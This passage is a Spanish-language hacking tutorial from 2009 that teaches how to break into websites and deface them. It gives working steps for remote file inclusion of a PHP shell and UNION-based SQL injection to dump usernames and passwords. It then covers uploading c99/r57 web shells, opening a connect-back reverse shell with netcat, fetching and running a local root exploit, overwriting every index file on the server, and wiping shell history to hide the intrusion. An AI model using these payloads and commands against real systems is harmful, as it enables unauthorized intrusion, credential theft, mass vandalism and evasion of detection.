puedes usar las dos, asi sera mejor para tu identidad anonima =).

-------------------------

+++++++ Penetrar ++++++++

-------------------------

[ Opcion 1 - RFI ]

RFI Que biene de Remote File Inclusion no es nada mas que una vulnerabilidad muy vieja que consiste
en que la variable no este filtrada y este incluida, es decir si tenemos este code ejemplo:



y este code esta en www.pepito.com/pepe.php nosotros facilmente podemos incluir nuestra shell
de la siguiente manera www.pepito.com/pepe.php?rfi=www.juakeroso.elite.xD.com/shell.txt?
suponiendo que la shell este en www.juakeroso.elite.xD.com/shell.txt y listo tendremos nuestra
php shell.

[ Opcion 2 - Sql Injection ]

Sql Injection esto es cuando las variables no son bien filtradas y estas son incluidas en querys, asi es
como se logra consultar hasta sacar usuarios, contraseñas, etc.
Ejemplo:

www.pepito.com.mx/index.php?id=15

Si tubieramos el codigo de dicho archivo leeriamos para ver el error pero si no tenemos el codigo?
pues probariamos con valores verdadero-falso, es decir para inyectar valor verdadero seria de
la siguiente manera

www.pepito.com.mx/index.php?id=15 and 1=1

y la web no tendria que cambiar su contenido en lo absoluto, pero si inyectamos un valor falso:

www.pepito.com.mx/index.php?id=15 and 1=0

si esta web es vulnerable mostrara algun cambio(error sql), como falta de contenido, etc.

ahora como saber cuantas columnas tiene la tabla?

bueno usariamos order by, ejemplo

www.pepito.com.mx/index.php?id=15 order by 1 - Muestra contenido correcto
www.pepito.com.mx/index.php?id=15 order by 2 - Muestra contenido correcto
www.pepito.com.mx/index.php?id=15 order by 3 - Muestra contenido correcto
www.pepito.com.mx/index.php?id=15 order by 4 - Muestra contenido correcto
www.pepito.com.mx/index.php?id=15 order by 5 - Muestra contenido correcto
www.pepito.com.mx/index.php?id=15 order by 6 - Muestra contenido correcto
www.pepito.com.mx/index.php?id=15 order by 7 - Muestra contenido correcto
www.pepito.com.mx/index.php?id=15 order by 8 - Muestra contenido correcto
www.pepito.com.mx/index.php?id=15 order by 9 - Aqui lo interesante

la pagina no mostrara el contenido completo o un error como el siguiente:

Unknown column '9' in 'order clause'

Esto quiere decir que tiene 8 columnas.

Ahora haremos consultas para obtener informacion de mysql.

Dijimos que tenia 8 columnas asi que:

www.pepito.com.mx/index.php?id=-1 union select 1,2,3,4,5,6,7,8

Ahora nos mostrara algunos numeros la pagina, esos corresponden a alguna columna de x tabla.

Supongamos que tiene tabla llamada usuarios y de columnas usuario y passwd, para hacer la consulta y
nos muestre el usuario y la password seria algo asi:

www.pepito.com.mx/index.php?id=-1 union select 1,2,3,4,5,6,7,8 from usuarios - Tabla usuarios

y seguimos viendo los numeros que corresponden a alguna columna, supongamos que son el

2,4,6 los numeros que se muestran, cambiaremos el 4 por el nombre de la columna usuario:

www.pepito.com.mx/index.php?id=-1 union select 1,2,3,usuario,5,6,7,8 from usuarios - Tabla usuarios : Columna usuario

y wow nos muestra el nombre del usuario, ahora cambiemos por passwd para que nos muestre la password =D

www.pepito.com.mx/index.php?id=-1 union select 1,2,3,passwd,5,6,7,8 from usuarios - Tabla Usuarios : Columna passwd

Asi es nos muestra la password. Pero podemos concatenar para que nos muestre usuario y password de la tabla usuarios =).

www.pepito.com.mx/index.php?id=-1 union select 1,2,3,concat(usuario,passwd),5,6,7,8 from usuarios

y con esto tendriamos usuario y contraseña de la tabla usuarios =O.

Ya tenemos el usuario y la password =), ahora pasemos al siguiente tema xD.

[ Opcion 3 - Mas opciones ]

hay mas opciones que solo rfi y sql inj, pero estas son las mas comunes si quieres saber mas, visita foros, webs, blogs
etc. google siempre te dara la respuesta y si no ay varios users de la red que son amables y te podran responder dudas =).

--------------------------------------------------

+++++++ Encontrar panel de administracion ++++++++

--------------------------------------------------

Bueno ya tenemos el usuario y password ahora falta encontrar el panel del administrador, aveces son faciles de encontrar
ya que la mayoria tiene como nombre de carpeta al panel como: panel, admin, administracion, administrador, adm, login
a veces solo es un archivo como: login.php, admin.php, adm.php, administrador.php, etc. es cuestion de imaginacion.
Pero algunas ocaciones es dificil ya que pueden ponerle de nombre ala carpeta logueatebuey y ni para cuando la vamos
a encontrar xDD, asi que en estos casos se pueden usar scanners, ya sea en perl, php, o software como intellitamper,
acunetix, etc.

NEXT XD

--------------------------------------------------

+++++++++++++ Subiendo phpshell ++++++++++++++++++

--------------------------------------------------

Ya tenemos usuario y password y el panel, asi que nos logueamos y worales somos admin xD, ahora
casi todas las webs tienen en el panel un uploader de archivos ya sea para imagenes o lo que sea
asi que aprobechamos y subimos la phpshell ya sea la c99, c40, c100, r57, la que sea.

--------------------------------------------------

++++++++++++++++ Rooteando +++++++++++++++++++++++

--------------------------------------------------

[ Que necesitamos? ]

Ok llegamos al punto al cual muchos se confunden, primero que nada necesitamos lo siguiente:

1. Netcat - Es una herramienta de red bajo licencia GPL (en la versión de GNU) disponible para sistemas
UNIX, Microsoft y Apple que permite a través de intérprete de comandos y con una sintaxis muy sencilla abrir
puertos TCP/UDP en un HOST (quedando netcat a la escucha), asociar una shell a un puerto en
concreto (para conectarse por ejemplo a MS-DOS o al intérprete bash de Linux remotamente) y forzar
conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de
archivos bit a bit entre dos equipos).

Sus capacidades hacen que sea a menudo usada como una herramienta para abrir puertas traseras una vez
invadido un sistema y obtenido privilegios de administrador o root del equipo. También resulta extremadamente
útil a efectos de depuración para aplicaciones de red.

2. Backdor(en este caso data cha0s) - La Data Cha0s es un Backdoor que opera haciendo un Connect Back, osea una
conexion inversa, de server a cliente. Tambien se conoce como reverse shell, en si funcionaria como un
troyano de conexion inversa =P.

3. Local Root Exploit - Término con el que se denomina en el entorno "hacker" a un método concreto de usar un error
de algún programa (bug) para entrar en un sistema informático. Generalmente, un exploit suele ser un programa que
se aprovecha de algún error del sistema operativo, por ejemplo, para obtener los privilegios del administrador y así
tener un control total sobre el sistema. Aunque como decíamos, un exploit no tiene por que ser un programa, por definición
es simplemente una forma de sacar provecho de un error en un programa (explotar un error).

Recuerda que la utilización de un "exploit" sin la supervisión/aprobación del administrador del sistema puede ser
considerado (y lo es) un delito y está penado con fuertes multas y/o cárcel.

4. Tener permisos de escritura, lectura y ejecucion.

[ Como saber si es rooteable el server donde tengo la phpshell? ]

Bueno pues como ya habiamos subido la phpshell, esta nos dice que version del kernel es,

enseguida de este comando biene la informacion seria algo como esto:

uname -a: Linux pepitoweb.com 2.6.18-8.el5 #5 smp Thu Mar 15 19:57:35 EDT 2007 i686 athlon i386 GNU/Linux

Ok pues aqui nos dice que es la version 2.6.18... bueno ahora iremos a www.milw0rm.com para buscar el local root exploit
Y si encontramos local root exploit pues quiere decir por logica que si se puede rootear y si no encontramos, quiere
decir que es priv8 o no es rooteable por lo consiguiente no ay root exploit para la version =P.

[ Poniendo ala escucha Netcat ]

Pues pongamos ala escucha netcat

Nos vamos a inicio/ejecutar/cmd y despues en la consola nos vamos a donde tenemos netcat,
ejemplo si lo pusimos en c: hacemos lo siguiente:
C:\Documents and Settings\Administrador>cd..
C:\Documents and Settings>cd..
C:\>
Luego tecleamos nc -lvvp puerto que queramos siempre y cuando lo tenga abierto el server y tu xD... ejemplo: nc -lvvp 21
C:\>nc -lvvp 21
listening on [any] 21 ...
Ok ya esta ala escucha el puerto 21.

[ Subiendo backdoor y ejecutandolo ]

Subimos la Data Cha0s y la ejecutamos, vamos al ejecutor de comando de la phpshell y tecleamos:

perl dc.pl tuip puerto que pusiste ala escucha en tu pc

perl dc.pl 127.0.0.1 21

Y nos dira lo siguiente:
Data Cha0s Connect Back Backdoor

[*] Dumping Arguments
[*] Connecting...
[*] Spawning Shell
[*] Datached

Ahora vamos a netcat y vemos si en realidad conecto, en caso que aya conectado aparecera lo siguiente, ejemplo:
connect to [127.0.0.1] xweb.com [127.0.0.1] 57566

y en caso de que no conecte seguira apareciendo:
listening on [any] 21 ...

De lo contrario ya estaremos conectados al server desde nuestra pc.

[ Subiendo Local Root Exploit, Compilarlo y Ejecutarlo ]

Bueno podemos subir el local root exploit de dos maneras diferentes una mediante wget desde netcat y la otra
por medio de la phpshell.

1. Por medio de netcat, ya conectados el server a nosotros tecleamos wget http://pepe.com/localrootexploit.c
y esperamos a que suba.
2. La mas rapida y facil subir a traves del upload de la phpshell.

Ya subido el local root exploit hay que compilarlo, de la siguiente manera tecleamos en netcat:

gcc localrootexploit.c -o bad

ok ya habiendolo compilado es hora de darle permisos para poder ejecutarlo, de esta forma le daremos permisos:

chmod -c 777 bad

y nos avisara cuando se cambien.

Es hora de ejecutarlo y tener uid(0) de root. Lo ejecutaremos de la siguiente forma:

./bad

ya que termine el local root exploit tecleemos id y nos mostrara esto:

uid=0(root) gid=0(root) groups=48(apache)

y listo ya tenemos uid(0) de root =).

--------------------------------------------------

++++++++++++++++ Mass Defecement +++++++++++++++++

--------------------------------------------------

Ya que somos root pues ahora si podemos meter comando y medio =P.

Supongo que ya tenemos nuestro index preparado con el owned by, y los Gr3tz no?
asi que ahora lo subimos, de igual manera que antes tenemos dos opciones de subirlo
mediante wget y el upload de la phpshell.

Buscaremos las webs alojadas en el server con el siguiente comando en netcat claro:

find / -name httpd.conf

Esto lleva tiempo asi que no desesperes =P.
Cuando termine de buscar nos mostrara el directorio y ahora veremos ese directorio para sacar
las webs alojadas con el siguiente comando, ejemplo:

cat /etc/httpd/conf/httpd.conf | grep ServerName

Les recomiendo guardar los dominios en un txt para despues poderlos visualizar.

Bueno ahora buscaremos todos los index.* del server y los sustituiremos por el nuestro con este comando:

find /etc/ -name "index.*" -exec cp /tmp/index.html {} \;

Bueno el directorio "etc" depende de cada server donde esten los dominios okz? y
este index es el que nosotros subimos, tambien depende a que carpeta lo subimos "/tmp/index.html".

y listo ya esta el mass defecement.

ahora ay que borrar logs asi que resetearemos el archivo que guarda el historial con el sig. comando:

unset HISTFILE

Tambien pueden buscar en google algunos zappers.
--------------------------------------------------

Link de Descarga de las utilidades:

http://rapidshare.com/files/209519905/Zer0_z0orG_www.zer0-z0org.com.zip

--------------------------------------------------

++++++++++++++++ Agradecimientos +++++++++++++++++

--------------------------------------------------

Oscar Rovira, Komtec1, Her0, 0o_ZeuS_o0, kakalake, MurdeR, Xtremo31,
syndr0me, knet, boer!, kaOs!, DADE, Ir0net, PandraX, l0gin-root, deyabu,
bucio, bikolinux, m0x, zutr4, j4mz, panther-root, f0urtruder, Poison san X,
dbytes, uxmal, phonix, the pink phanter, You Know, fresnohack, xoptik,
furcronet, zakix, en3sis, v-getah, Elinet, kar0nt3, Inferno, ruderford
and more friends.

&&

HsLTeam & DiosdelaRed & RemoteExecution

--------------------------------------------------

+++++++++++++++++ Contacto +++++++++++++++++++++++

--------------------------------------------------

Para cualquier duda, pregunta, comentario, mentada de madre, xD, etc.

E-mail: Zer0-z0orG@GobiernoFederal.com
Website: http://www.zer0-z0org.com
http://informaticaxd.com.ar

--------------------------------------------------

++++++++++++++++ Good Bye +++++++++++++++++

--------------------------------------------------

Espero sea entendible y de su agrado.

15 de Marzo del 2009

By Zer0 z0orG - Ir4Dex Group